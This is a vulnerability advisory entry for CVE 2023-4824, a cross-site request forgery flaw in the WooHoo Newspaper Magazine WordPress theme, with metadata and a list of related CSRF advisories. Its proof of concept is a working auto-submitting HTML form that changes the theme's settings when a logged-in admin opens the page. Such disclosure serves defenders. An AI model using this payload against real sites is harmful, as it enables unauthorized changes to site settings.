WooHoo Newspaper Magazine Theme <= 2.5.3 – Settings Update via CSRF | CVE 2023-4824 | Theme Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

Make an admin open an HTML page with the following HTML:

```
<form action="https://wps-test.ddev.site/wp-admin/admin.php?page=mypanel&do=submit" method="POST"> 
    <input type="text" name="bdaia_t_title" value="CSRF Title"> 
</form>
<script> document.forms[0].submit(); </script>
```

See that the plugin's "Header Options > Toolbar Options > Title" has been updated to `CSRF Title`

Affects Themes

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

71c616ff-0a7e-4f6d-950b-79c469a28263

Timeline

Publicly Published

2023-10-27 (about 2 years ago)

Added

2023-10-27 (about 2 years ago)

Last Updated

2023-10-27 (about 2 years ago)

Other

Published

Title

Published

2022-12-05

Title

Loginizer <= 1.7.5 - Cross-Site Request Forgery

Published

2025-07-03

Title

Trust Payments Gateway for WooCommerce (JavaScript Library) < 1.3.7 - Cross-Site Request Forgery

Published

2025-08-14

Title

Build App Online <= 1.0.23 - Cross-Site Request Forgery

Published

2024-08-16

Title

Dark Mode for WP Dashboard < 1.2.4 - Cross-Site Request Forgery

Published

2025-03-11

Title

WATI Chat and Notification < 1.1.5 - Stored XSS via CSRF